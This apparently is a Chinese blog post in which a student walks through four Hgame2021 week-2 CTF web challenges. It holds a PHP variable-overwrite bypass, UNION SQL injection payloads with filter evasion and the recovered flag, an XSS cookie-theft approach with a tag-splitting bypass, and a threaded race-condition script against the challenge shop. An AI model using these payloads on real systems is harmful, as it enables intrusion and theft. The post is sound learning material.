-----已搬运-----Hgame2021 week2 web ---------(条件竞争)(XSS)(sql注入)(代码审计)

最新推荐文章于 2023-01-22 19:10:36 发布
最新推荐文章于 2023-01-22 19:10:36 发布
阅读量547 收藏 3
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zero_Adam/article/details/113829312
版权
本文回顾了Hgame2021网络安全周赛中关于Web安全的题目,涉及 LazyDogR4U、Post to zuckonit、200OK!! 和 Liki的生日礼物 四个部分,重点讨论了XSS、SQL注入和代码审计等技术,包括双写绕过、变量覆盖、条件竞争等解题策略。作者通过学习WP(Write-up),认识到耐心和深入理解知识点的重要性。
摘要由CSDN通过智能技术生成

目录:

向大佬学习,
参考自:Hgame2021 week2 web

一、LazyDogR4U

1.我的尝试:

。。。没做出来,,感觉好多,好长,好麻烦,,,
不得不说phpstorm在代码审计的时候,比notepad++强不知道多少,,

2.我的不足:

  1. 一个就是毅力不够么,,当时看看感觉很复杂就不做了,,
  2. 看到黑名单,将关键词替换为空。没有很敏感的意识到 替换为空 可以利用 双写绕过 。。这个也是个问题
  3. 我当时 是想把整个东西代码全部都弄懂之后再 做题,结果,一看WP,根本不用全弄懂嘛( $ _ $ )。。。当时给我看的蒙圈了,其实需要的知识点不多,就是变量覆盖的知识点。

flag.php

<?php
session_start();

require_once 'lazy.php';
/* 你直接访问,就怼 <(^-^)> 你 */
if(!isset($_SESSION['username'])){
    die('您配吗?');
}

/* 这里我把一些html的格式给删除了,不影响*/

if($_SESSION['username'] === 'admin')
{
    echo "<h3 style='color: white'>admin将于今日获取自己忠实的flag</h3>";
    echo "<h3 style='color: white'>$flag</h3>";
}
else
    {
    if($submit == "getflag") {echo "<h3 style='color: #364036'>{$_SESSION['username']}接近了问题的终点</h3>";}
    else {echo "<h3 style='color: white'>篡位者占领了神圣的页面</h3>"}
}

index.php

<?php
session_start();
require_once "lazy.php"; //包含
if(isset($_SESSION['username'])){//如果session中有 username这个值的话,重定向到flag.php
    header("Location: flag.php");
    exit();
}else{
    if(isset($username) && isset($password)){
        if((new User())->login($username, $password)){
            header("Location: flag.php");
            exit();
        }else{
            echo "<script>alert('食人的魔鬼尝试着向答案进发。')</script>";
        }
    }
}
?>

lazy.php

<?php
$filter = ["SESSION", "SEVER", "COOKIE", "GLOBALS"];

// 直接注册所有变量,这样我就能少打字力,芜湖~

/* 将get,post两个的传参数组的键值对都拿出来,然后键名中的黑名单替换为空 */
foreach(array('_GET','_POST') as $_request){
    foreach ($$_request as $_k => $_v){//这里一看就是突破点嘛,$$容易导致变量覆盖漏洞,
        foreach ($filter as $youBadBad){
            $_k = str_replace($youBadBad, '', $_k);
        }
        ${$_k} = $_v;
        //这个大括号,我去了解了,就是括号的意思,里面的是一个变量,
        //然后外边在把里面的值当作可变变量的名
    }
}
// 自动加载类,这样我也能少打字力,芜湖~
function auto($class_name){
    require_once $class_name . ".php";
}
spl_autoload_register('auto');

user.php

<?php
class User
{
    function login($username, $password){
        if(session_status() == 1){
            session_start();
        }
        $userList = $this->getUsersList();
        if(array_key_exists($username, $userList)){
            if(md5($password) == $userList[$username]['pass_md5']){
                $_SESSION['username'] = $username;
                return true;
            }else{
                return false;
            }
        }
        return false;
    }

    function logout(){
        unset($_SESSION['username']);
        session_destroy();
    }

    private function getUsersList(){
        return Config::getAllUsers();
    }
}

config.php

<?php
class Config{

    private static array $conf;
    /**
     * @var array|false
     */

    static function init(){
        self::$conf = parse_ini_file('config.ini', true);
    }

    static function getItem($section, $key){
        return self::$conf[$section][$key];
    }

    static function getAllUsers(): array
    {
        $users = self::$conf;
        unset($users['global']);
        return $users;
    }
}
Config::init();

当时就分析了这么多

3.学习WP的

我参考的wp是从 目的出发的,直接找,从那里能够出flag。

flag.php中的这里session中的username=admin就可了。

if($_SESSION['username'] === 'admin')
{
    echo "<h3 style='color: white'>admin将于今日获取自己忠实的flag</h3>";
    echo "<h3 style='color: white'>$flag</h3>";
}

session的话,再返回lazy.php
注释是当时做题的时候写的,可以选择性忽略。。

/* 将get,post两个的传参数组的键值对都拿出来,然后键名中的黑名单替换为空 */
foreach(array('_GET','_POST') as $_request){
    foreach ($$_request as $_k => $_v){//这里一看就是突破点嘛,$$容易导致变量覆盖漏洞,
        foreach ($filter as $youBadBad){
            $_k = str_replace($youBadBad, '', $_k);
        }
        ${$_k} = $_v;
        //这个大括号,我去了解了,就是括号的意思,里面的是一个变量,
        //然后外边在把里面的值当作可变变量的名
    }
}

总的功能就是将get,post两个数组中的键值对拿出来,并对他们进行相应的赋值。同时将 键名中的 一些敏感字符给过滤掉。
这里它 将敏感字符替换为空,所以可以 双写绕过

。。我第一时间是在lazy.php上提交的,没反应。然后在index上才好

?_SESSION['username']=admin

在这里插入图片描述

二、Post to zuckonit

1.自己做的,

我的XSS的水平为0.。
甚至练aler(1)都出不来,,
在这里插入图片描述

xss。要弄到管理员的cookie啊
在这里插入图片描述

在这里插入图片描述
环境坏掉了,,,

2. 不足:

  1. 没有脚,,,脚本能力太差了。。

3.学习大佬的WP:

说一下大佬的思路吧。首先script会被替换成div,但是我测试发现base会被置换为控,如果构造<scribasept>alert(1)</scribasept>,可以成功弹窗。

不会,,,想看xss思路的化,看本地的笔记吧,

你输入code,code进行md5加密后的前六位是d600f2的话,就可以submit。然后你的xss脚本是弹cookie的就好。
应该就会弹出cookie然后 抓包访问 flag页面,改一下cookie应该就好了,。然后xss的脚本看这个https://www.cnblogs.com/yuzly/p/10692449.html。里面的xss很全,只要不是bypass很强的,应该都能过。
然后这个code的话,写个py脚本,,
这个脚本还是跟大佬要的。。。哎呀,没脸了,,

import hashlib

for i in range(10000000):

    md = hashlib.md5()
    md.update(str(i).encode('utf-8'))
    n = md.hexdigest()
    if n[0:6] == '3c4f4b':
        print(i);
        # output:
        5689538
        8869817

三、200OK!!

1.我当时做的:

好家伙,每一次点的都不一样,,抓个包,
在这里插入图片描述
在这里插入图片描述
整个status有东西的呀,
整个不是常规HTTP头的东西,明显是出题人加的一个头。
尝试看看是不是有sql注入,
在这里插入图片描述
用union select 报错也不显示,便想用报错注入看看
。。。结果好像报错注入,也不报错,,我就急躁了,

2.收获:

  1. 给我的教训就是,要耐心,先别总是急着换方法,别 union select 不好使就换成报错注入,多试试 看,看看哪些被过滤了,。然后慢慢来
  2. 注意抓包中的HTTP头,注意看里面有什么 多余的 头,就是不是必须的头,很可能那就是解题的地方。

3. 又学习WP,

说是过滤了这些:

['select', 'SELECT', 'from', 'FROM', 'union', 'UNION', 'where','WHERE', ' ']

这就好办了,大小写绕一下, 然后空格绕过一下。绕空格的话,因为不是url,所以不能用%20来绕过,
只能用 /**/ 整个,内敛注释来代替空格了

在这里插入图片描述
好家伙,我order by 了半年,唯独没有从1 开始order。。。

3335'/**/uniON/**/SeleCt/**/database()#      week2sqli爆的这个,

3335'/**/uniON/**/SeleCt/**/table_name/**/frOm/**/
information_schema.tables/**/whERe/**/table_schema='week2sqli'#               f1111111144444444444g

3335'/**/uniON/**/SeleCt/**/column_name/**/frOm/**/information_schema.columns
/**/wheRe/**/table_name='f1111111144444444444g'#          ffffff14gggggg

3335'/**/uniON/**/SeleCt/**/ffffff14gggggg/**/fROm/**/f1111111144444444444g#

hgame{Con9raTu1ati0n5+yoU_FXXK~Up-tH3,5Q1!!=)}

讲真的。难顶啊,给我的教训就是,要耐心,先别总是急着换方法,别 union select 不好使就换成报错注入,多试试 看,看看哪些被过滤了,。然后慢慢来

四、Liki的生日礼物

开始一个注册登陆页面,正常注册登陆进入,
在这里插入图片描述

1.我的错误的尝试:

我的第一反应是,看看是不是python写的,考点是不是json web token。
在这里插入图片描述

不是,然后扫目录也没什么,那就看源码,和网络,看看里面有什么hints没有。
在这里插入图片描述
在这里插入图片描述便点开看了看,找到了,我感觉比较有用的东西。
在这里插入图片描述看到这个,也不知道该怎么弄,然后几句看看js代码,看看是不是ks在控制这些购买功能之类的
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
当时我是看不懂,然后学习WP的时候,也看不懂。。
当时就这样了,不会做啦。

2. WP做法

WP说,这个是典型的条件竞争的题,然后我就赶忙去学习了条件竞争,一看也是啊。买东西,趁他不注意,多买一点就够了嘛,就是买的时候。注意保持SESSION一致。

import threading
import requests
import json
import time

loginurl="https://birthday.liki.link/API/?m=login"
# 注册自己的账号
user={"name":"qwerasdf","password":"qwerasdf"}
# 会话开启
s= requests.session()
# 登陆商城。向这个页面,post数据user
s.post(url=loginurl,data=user)
# 定义一个函数,队徽多线程的时候来调用这个方法
def post():
    data = {"amount":"1"}
    buyurl = "https://birthday.liki.link/API/?m=buy"# 有解释
    # 购买兑换券
    try:#能买的话,一次买一个
        s.post(url=buyurl,data=data)
    except:
        print("Failed.")
    return
# 构造循环来运行多线程并判断中止条件
while True:
    # 这里是获取当前用户的信息
    infourl="https://birthday.liki.link/API/?m=getinfo"
    info = json.loads(s.get(url=infourl).text)# 有解释
    money = info['data']['money']
    num = info['data']['num']
    print(money)
    print(num)
    # 当票数超过52张的时候就停止。
    if num >= 52:
        flagurl = "https://birthday.liki.link/API/?m=getflag" #有解释
        print(s.get(url=flagurl).text)#获取该页面的文本
        break
    # 多线程开启,30个线程同时进行。多一点,30就查不多
    for i in range(30):
        # 调用post()方法作为执行的方法,注意这个函数只写函数行就行了,不能够加括号
        t = threading.Thread(target=post)# 这里也不是太明白
        t.start()
    time.sleep(10) #这个是时间停留什么意思???

3.对脚本的一些呼应解释:

这里解释一下为什么脚本的第12行那里要用post方法来登陆,这也是我们抓包之后,才能够发现的啊
在这里插入图片描述

16行的那个buy的页面
在这里插入图片描述

26行的 当前用户信息:
在这里插入图片描述

27行打印出来就是这个。和上面这个一样的展示
在这里插入图片描述
把数据按照字典的形式弄出来???,等学一下json

这是34行的解释
在这里插入图片描述

第38,39,40。这一块再学一学,threading这还不会,还有那个json这里也学一学

42行,time.sleep()推迟
sleep就是停一下子,没有什么,东西,

终于出了,,,
在这里插入图片描述不用sleep也可以的
在这里插入图片描述

Zero_Adam
关注
专栏目录
HGAME2021--RE题解
FIshy000的博客
03-29 1689
前言 hgame 2021的逆向部分题解,一道nc题和一道安卓逆向没有做,每周的题目都看了看,做了四分之三左右,杭电的比赛题目出得很有水平,自己学到了很多东西,wp本来说每周都写的,但是懒,比赛都结束一个月了才偷工减料得写出来。有兴趣的师傅凑合着看看吧吧???? RE-week1 一杯阿帕茶 明显的TEA加密标志,后面分析为XXTEA加密 加密后的数据,刚好35位 #include <stdint.h> #include <stdio.h> #define DELTA 0x9e
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
HGAME2021 Week2 Web wp
Lum1n0us's Blog
02-15 495
LazyDogR4U 进链接后发现是一个登录界面,因为东方明珠塔警告,先试试常见路径www.zip/www.rar,发现www.zip能获得网站源码
hgame2021 week2 pwn刷题
qq_45595732的博客
02-14 440
rop_primary 矩阵相乘,算法分析用过numpy就直接调用numpy现有的库了,常规栈溢出,但是不知道为什么system的系统调用貌似被禁用了,所以用了orw,没拿shell from pwn import* import numpy as np from LibcSearcher import* context.log_level = 'debug' def pr(a,addr): log.success(a+'====>'+hex(addr)) elf = ELF('./rop_prim
Hgame2021 week2 web
feng的博客
02-15 1094
前言 week2web难度还好,一道变量覆盖,一道SQL注入,一道条件竞争还有一道XSS。因为不会前端。。。XSS没做出来,今天学习一下官方的WP和大师傅们的WP。 LazyDogR4U 存在www.zip,下载下来审一下代码。要想得到flag,需要if($_SESSION['username'] === 'admin'){ 但是正常的登录时没法让session那里是admin的,所以这题其实登录不登录没什么用。 注意这里: $filter = ["SESSION", "SEVER", "COOKIE",
[杭电Hgame]2021web week2(变量覆盖+多线程条件竞争+sql注入
Huamang的博客
02-15 528
LazyDogR4U 考察变量覆盖,这篇博客写的很详细 首先是源码泄露,www.zip就可以拿到网站文件 代码审计 如果$_SESSION['username'] === 'admin'就会给flag if($_SESSION['username'] === 'admin'){ echo "<h3 style='color: white'>admin将于今日获取自己忠实的flag</h3>"; echo "<h3 style='color: wh
Hgame week2
weixin_44255856的博客
02-10 260
Web2: (2)php trick 打开链接,发现源码,一看就是个代码审计的题!头疼 先来分析下源码; 第一二步是传入str1,str2且他们原来的值不能相等,但md5值要相等所以payload ?str1=QNKCDZO&amp;amp;str2=s878926199a 第三四步是str3,str4原来值相等,但md5类型要相同且值相等,这里数组绕过 payload str3[]=1&amp;amp;str...
虚拟机挑战解析:hgame-week4-easyvm与cg-ctf WxyVM
"虚拟机题目解析,包括hgame-week4-easyvm、cg-ctf wxyVM1/2,涉及虚拟机基础知识、数据处理及逆向工程" 虚拟机技术是计算机科学中的一个重要领域,它允许在单一硬件系统上运行多个操作系统实例。在网络安全和密码...
hgame 2021 week2 web re crypto misc
qq_51868336的博客
02-15 1624
杭电hgame2021 week2 week1比较简单就不贴wp了,week3还在做 高光时刻(Nano太强啦,随时就会被超了 web LazyDogR4U www.zip可获得源码,分析一下php就行 submit=getflag&_SESSESSIONSION[username]=admin Post to zuckonit xss,写个爆破md5的脚本,在服务器搭个接收cookie的环境 xss的payload >;eikooc.tnemucod+'=eikooc?php.xedni/
CTF-RE-shinyshot!(Hgame week2)
SuperGate的博客
02-17 706
hd的师傅们出的题还是十分有意思的……这道题花了很多天时间才有了头绪,现在才搞出来。 我们把程序扔进ida反复调试后发现了一个奇怪的函数:sub_401460(v10),这个函数将我们输入的数字进行操作。我们点进去看: 很懵逼,没有见过的底层函数,和奇奇怪怪的变量名称。由于内部对toplevelexceptionfilter变量进行的操作比较多,我们首先关注这个变量。 在每次调试的时候都...
HGAME-week2-web-wp
静仙的博客
02-18 3480
web萌新的ctf之旅
hgameweek2-wp
wuerror的博客
02-23 765
week2-wp wuerror web easy php 使用…/./来绕过 str_replace(`'../', '', $img`) ?img=…/./flag可以得到回显maybe_you_should_think_think 再想想,试试伪协议读取文件看看 伪协议:?img=php://filter/read=convert.base64-encode/resource=…/...
hgame2023-week2
247533的博客
01-20 1178
hgame week2
Hgame2023_Week2[crypto]
weixin_52118017的博客
01-22 602
hgame2023_week2密码方向题解
Hgame2021,web,week1
Holl0w_By的博客
02-20 342
HGAME2021,week1,web总结: 之前耽误了一段时间,现在才开始写wp。总之,果然还是实战比较管用。 1、Hitchhiking_in_the_Galaxy 这个题一进界面就有一个大大的404,只有一个链接可以点。点了之后又会回到index.php页面,这个时候就应该使用burpsuite来对该链接进行拦截和重定向。 发包后看见了一个提示: 上面提示说顺风车不是这么搭的,有一个405,这个状态码表示指定的URL不支持请求中所使用的方法。 一般来说,常用的请求方法就是GET和POST,这个时候就
HGAME2021 - 梦的开始
anwen12的博客
03-01 2275
HGAME2021 - 梦的开始 WEB 0x01 200OK! 参考链接:https://blog.csdn.net/anwen12/article/details/113728065 0x02 LazyDogR4U 一个简单的代码审计类的问题 这是提示 这里请不要像沙雕的博主一样,将简单的替换为空,理解为需要找寻其他的系统变量,因为所有的变量都已经被制空了。至于需要一个已经登陆的账号,0e的MD5绕过大可不必再说。 0x03 LIKI的生日礼物 题目的初步探索,没有注入,没有购买逻辑漏洞,有的只有竞
[HgameCtf Week2 ]三道堆题总结
qq_42220888的博客
01-20 362
hgame 2023 week2
hgame2022-week2-wp
最新发布
网安小菜鸡
01-22 1396
hgame-wp
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值